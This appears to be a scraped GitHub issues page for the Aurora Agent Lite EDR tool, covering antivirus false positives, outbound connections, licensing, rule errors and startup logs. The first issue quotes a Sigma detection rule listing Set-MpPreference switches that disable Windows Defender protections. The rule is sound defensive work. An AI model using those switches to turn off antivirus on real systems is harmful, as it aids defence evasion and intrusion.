nextronsystems / aurora-agent-lite Goto Github PK

Hi, just got a high detection from WIndows Defender on one of the Aurora yml rule : posh_pc_tamper_windows_defender_set_mp.yml.
It was detected as Trojan:Script/Phonzy.A!ml and quarantined.

Affected elements are :

• Aurora-Agent\signatures\sigma-rules\public\windows\powershell\powershell_classic\posh_pc_tamper_windows_defender_set_mp.yml
• Aurora-Agent\signatures\sigma-rules\public\windows\powershell\powershell_script\posh_ps_tamper_windows_defender_set_mp.yml

Not sure what part of the file could have triggered it but it seems to be a ML detection so maybe it just misunderstood.
Also, Aurora light is installed for like a week, so I'm not sure why it didn't trigger before.

Content of the file :

title: Tamper Windows Defender - ScriptBlockLogging
id: 14c71865-6cd3-44ae-adaa-1db923fae5f2
related:
    - id: ec19ebab-72dc-40e1-9728-4c0b805d722c
      type: derived
status: experimental
description: Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
    - https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps
    - https://bidouillesecurity.com/disable-windows-defender-in-powershell/
author: frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
date: 2022/01/16
modified: 2024/01/02
tags:
    - attack.defense_evasion
    - attack.t1562.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_options_disabling_preference:
        ScriptBlockText|contains: 'Set-MpPreference'
    selection_options_disabling_function:
        ScriptBlockText|contains:
            - '-dbaf $true'
            - '-dbaf 1'
            - '-dbm $true'
            - '-dbm 1'
            - '-dips $true'
            - '-dips 1'
            - '-DisableArchiveScanning $true'
            - '-DisableArchiveScanning 1'
            - '-DisableBehaviorMonitoring $true'
            - '-DisableBehaviorMonitoring 1'
            - '-DisableBlockAtFirstSeen $true'
            - '-DisableBlockAtFirstSeen 1'
            - '-DisableCatchupFullScan $true'
            - '-DisableCatchupFullScan 1'
            - '-DisableCatchupQuickScan $true'
            - '-DisableCatchupQuickScan 1'
            - '-DisableIntrusionPreventionSystem $true'
            - '-DisableIntrusionPreventionSystem 1'
            - '-DisableIOAVProtection $true'
            - '-DisableIOAVProtection 1'
            - '-DisableRealtimeMonitoring $true'
            - '-DisableRealtimeMonitoring 1'
            - '-DisableRemovableDriveScanning $true'
            - '-DisableRemovableDriveScanning 1'
            - '-DisableScanningMappedNetworkDrivesForFullScan $true'
            - '-DisableScanningMappedNetworkDrivesForFullScan 1'
            - '-DisableScanningNetworkFiles $true'
            - '-DisableScanningNetworkFiles 1'
            - '-DisableScriptScanning $true'
            - '-DisableScriptScanning 1'
            - '-MAPSReporting $false'
            - '-MAPSReporting 0'
            - '-drdsc $true'
            - '-drdsc 1'
            - '-drtm $true'
            - '-drtm 1'
            - '-dscrptsc $true'
            - '-dscrptsc 1'
            - '-dsmndf $true'
            - '-dsmndf 1'
            - '-dsnf $true'
            - '-dsnf 1'
            - '-dss $true'
            - '-dss 1'
    selection_other_default_actions_allow:
        ScriptBlockText|contains: 'Set-MpPreference'
    selection_other_default_actions_func:
        ScriptBlockText|contains:
            - 'HighThreatDefaultAction Allow'
            - 'htdefac Allow'
            - 'LowThreatDefaultAction Allow'
            - 'ltdefac Allow'
            - 'ModerateThreatDefaultAction Allow'
            - 'mtdefac Allow'
            - 'SevereThreatDefaultAction Allow'
            - 'stdefac Allow'
    condition: all of selection_options_disabling_* or all of selection_other_default_actions_*
falsepositives:
    - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.
level: high

Not sure if this is considered as a real issue but at least you have the info now.

We are seeing external IP contact attempts from launcher.exe to, at least, the following IP addresses:
208.111.186.0
208.111.186.128
35.196.217.93
34.149.84.181
23.218.218.71
2600:1408:c400:24::17da:d81b
2600:1408:c400:24::17da:d832
23.218.218.70
23.47.204.45
23.204.152.18
23.204.152.20
23.204.152.38
23.204.152.43
23.204.152.45
23.204.152.5
23.215.0.12
23.215.0.13
23.215.0.15
23.215.0.4
23.215.0.5
23.215.0.9
23.218.218.17
23.218.218.24
23.218.218.71
23.218.218.76
23.221.227.25
23.221.227.32
23.221.227.33
23.221.227.38
23.221.227.52
23.221.227.9
23.223.17.164
23.223.17.168
23.47.204.45
23.47.204.46
23.47.204.50
23.47.204.53
23.47.204.54
23.47.204.65
23.47.204.72
23.47.204.74
23.47.204.79
23.47.204.81
23.49.5.196
23.49.5.214
23.53.122.134
23.53.122.137
2600:1404:ec00:45::1724:d9af
2600:1404:ec00:45::1724:d9b0
2600:1407:b800::6872:4f91
2600:1407:b800::6872:4fba
2600:1408:c400:2e::17de:410
2600:1408:c400:2e::17de:41b
2600:1408:ec00:17::17d7:86
2600:1408:ec00:17::17d7:8f
2600:1408:ec00:23::1735:2349
2600:1408:ec00:23::1735:2350
2600:141b:f000:14::172e:9c86
2600:141b:f000:14::172e:9c9e
2600:141b:f000:14::172e:9ca9
2600:141b:f000:14::172e:9cb0
34.149.84.181
35.196.217.93
88.221.134.16
88.221.134.9
88.221.135.208
88.221.135.210
88.221.135.219
88.221.135.89
92.123.140.122
92.123.142.232

What are these attempts for? Does the client update sigma rules via any of these resources? Is there any data from our network being sent anywhere? Thank you for your assistance.

Hello,

When downloading Aurora Lite from nextron-systems.com Bitdefender Total security detected as dangerous and blocked the aurora-agent-lite-win-pack.zip installation files.

C:\Users\xxx\Downloads\aurora-agent-lite-win-pack.zip attempted to load a malicious resource detected as Amsi.Edge.22.87AF370A and was blocked. Your device is safe.

Is it useful/advisable to install Aurora Agent Lite in addition to an antivirus to detect possible security compromises?
My goal is to learn how to use an EDR.

THANKS

Good day

I have downloaded the lite version of Aurora EDR, but when I try to download the license file the server displays a "site can't be reached" error.

dashboard does not reload unless i reinstall Aurora again. why ?

it is up and running though.

Hi,

Not sure this is the correct place to report, but I did not get email after license expiration.
I think I'm still subscribed to the news letter, but my license expired 12/04 and did not get the new download link (spam folder checked).

Regards.

I am making a lightweight windows process monitoring demo, which can sense the start and end of the process in real time, I do not want to use NT kernel-mode driver. nor ETW or WMI, they will have a certain delay, poor effect for instantaneous processes.

My colleague recommended me to learn about aurora, I tried it out, and it worked well.

Can you give me some advice or help with this problem?

Hi,

I tried to exclude processes related to my cybersecurity suite due to rule 'Potential Antivirus Software DLL Sideloading' (quite efficient, but generates too much alarms for me).

Procedure I followed: https://aurora-agent-manual.nextron-systems.com/en/latest/usage/aurora-agent-util.html#excluding-processes

I'm facing error message below:

PS C:\Program Files\Aurora-Agent> .\aurora-agent-util.exe exclude
Error: unknown command "exclude" for "aurora-agent-util"
Run 'aurora-agent-util --help' for usage.
Feb  5 09:08:16 [REDACTED] AURORA: Error MODULE: Aurora-Agent MESSAGE: unknown command "exclude" for "aurora-agent-util"

Result of 'version' command:

PS C:\Program Files\Aurora-Agent> .\aurora-agent-util.exe version
      ___                                  __    _ __
     /   | __  ___________  _________ _   / /   (_) /____
    / /| |/ / / / ___/ __ \/ ___/ __ `/  / /   / / __/ _ \
   / ___ / /_/ / /  / /_/ / /  / /_/ /  / /___/ / /_/  __/
  /_/  |_\__,_/_/   \____/_/   \__,_/  /_____/_/\__/\___/


  Aurora Agent Lite Version 1.1.5 (2a65c69d13bed), Signature Revision 2023/02/04-190348 (Sigma 0.22-1986-gfebefa7e0)
  (C) Nextron Systems GmbH, 2022

Result of 'upgrade' command:

PS C:\Program Files\Aurora-Agent> .\aurora-agent-util.exe upgrade
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: License file found OWNER: [REDACTED] VALID: true VALID_FROM: [REDACTED] VALID_TO: [REDACTED]
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: Checking for new version PRODUCT: aurora-agent-lite-win
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: Already up to date PRODUCT: aurora-agent-lite-win VERSION: 1.1.5
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: No Aurora Agent upgrade available, checking for signature update
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: License file found OWNER: [REDACTED] VALID: true VALID_FROM: [REDACTED] VALID_TO: [REDACTED]
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: Checking for new version PRODUCT: aurora-signatures-lite
Feb  5 09:18:47 [REDACTED] AURORA: Info MODULE: Aurora-Agent MESSAGE: Already up to date PRODUCT: aurora-signatures-lite VERSION: 23.2.4-190347

Is it due to the use of Free version?

Regards,
WikiJM

We're testing out the aurora agent lite and ingesting the logs from Windows event logs to elasticsearch via winlogbeat. We are working on creating an ingest pipeline to normalize the data as best we can to ECS but the manual doesn't specify anything with regards to the log fields. Anything u can provide would be great. Also the manual specifies that the event codes used by aurora logs are internal but doesn't specify what they mean and the differences between them. Anything on that would be great too.

Issue where Aurora Agent Is mounting certain folders that Exist in C:/ for basic windows paths (program files, system32etc) and mounts them as F:/4/Windows

The F drive exists, but no F:/4/ path exists.

This leads to sigma rulesets firing for "unusual folder" when the folder path has been mistakenly set by aurora agent.

Screenshot for context.

Proof path doesn't exist:

Hi,

I'm getting an error message about the compilation of a Sigma rule, as follows:

AURORA: Error
MODULE: Sigma
MESSAGE: Could not compile rule
ERROR: syntax error in selection_ip_3 element of rule Obfuscated IP Download Activity: error parsing regexp: invalid or unsupported Perl syntax: (?!
FILE: public\windows\process_creation\proc_creation_win_susp_obfuscated_ip_download.yml
ID: cb5a2333-56cf-4562-8fcb-22ba1bca728d
TITLE: Obfuscated IP Download Activity

Seems to be a problem with the lines 37, 39, 41 and 45, that have the '(?!' symbols. When these lines are commented, the agent runs normally.

hey,

Any reason why lite version has p/ amsibypass.b with the down load ?

Hi,

Sinnce 12/05, aurora-agent doesn't start.

Debug output:

May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Aurora-Agent MESSAGE: Started CPU limiter LIMIT: 35
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Aurora-Agent MESSAGE: Started offering status information
      ___                                  __    _ __
     /   | __  ___________  _________ _   / /   (_) /____
    / /| |/ / / / ___/ __ \/ ___/ __ `/  / /   / / __/ _ \
   / ___ / /_/ / /  / /_/ / /  / /_/ /  / /___/ / /_/  __/
  /_/  |_\__,_/_/   \____/_/   \__,_/  /_____/_/\__/\___/


  Aurora Agent Lite Version 1.0.5 (1ee787bfd27f7), Signature Revision 2022/05/12-150708 (Sigma 0.21-330-g1f7021fed)
  (C) Nextron Systems GmbH, 2022

May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: EventDistributor MESSAGE: Initialized process excludes EXCLUDES: 1
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ETWSource MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ETWKernelSource MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: EventlogSource MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: PollHandles MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Initializing module
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\c2-iocs.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\c2-iocs.dat as 'domains' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\falsepositive-hashes.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\falsepositive-hashes.dat as false positive 'hash' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\filename-iocs.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\filename-iocs.dat as 'filename' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\hash-iocs.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\hash-iocs.dat as 'hash' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\keywords.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Handling ioc file FILE: C:\Program Files\Aurora-Agent\signatures\iocs\otx-hash-iocs.dat
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Reading iocs from C:\Program Files\Aurora-Agent\signatures\iocs\otx-hash-iocs.dat as 'hash' type
May 14 08:23:43 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Hash IOC has invalid length (should be MD5, SHA1 or SHA256) FILE: C:\Program Files\Aurora-Agent\signatures\iocs\otx-hash-iocs.dat STRING: 2d56709dfa628bdb10453b4d23d36491
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 2832 filename ioc strings and 464 filename ioc regexs TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 1666 malware domains TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 49777 malware and 30 false positive hashes TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 0 named pipe ioc strings and 0 named pipe ioc regexs TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: ApplyIOCs MESSAGE: Successfully compiled 0 malicious handles and 0 regex malicious handles TYPE: IOC
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Rescontrol MESSAGE: Initializing module
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Initializing module
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading sigma rules FOLDER: C:\Program Files\Aurora-Agent\signatures\sigma-rules
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading sigma rules FOLDER: C:\Program Files\Aurora-Agent\custom-signatures
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading log source SOURCE: C:\Program Files\Aurora-Agent\log-sources\event-log-sources.yml
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading log source SOURCE: C:\Program Files\Aurora-Agent\log-sources\etw-log-sources-standard.yml
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Loading log source SOURCE: C:\Program Files\Aurora-Agent\log-sources\etw-log-source-mappings.yml
May 14 08:23:44 LAPTOP-T8LOPKCL AURORA: Debug MODULE: Sigma MESSAGE: Compiling sigma rules
could not initialize Module Sigma: could not load sigma rules: no valid sigma rules found

Indeed, the aurora-signatures-lite-pack.zip does not provide any sigma rules:

I was able to reinstall rules from initial package and successfully start agent, but I guess next update will break it again.

Great tool anyway and thank you for sharing.

Regards.

Hi There,

Thank you for this project.

I´m beginning to play Aurora Lite. I ran the agent without installation, just:

aurora-agent-64.exe
https://aurora-agent-manual.nextron-systems.com/en/latest/usage/usage.html#run-aurora

However, I wanted to know if there a way to only run a scan to dig into past Windows Event Logs (to check Sigma-based event matching there), and also is there any way to get an HTML report (like THOR lite or LOKI).

Thanks in advance.

Regards.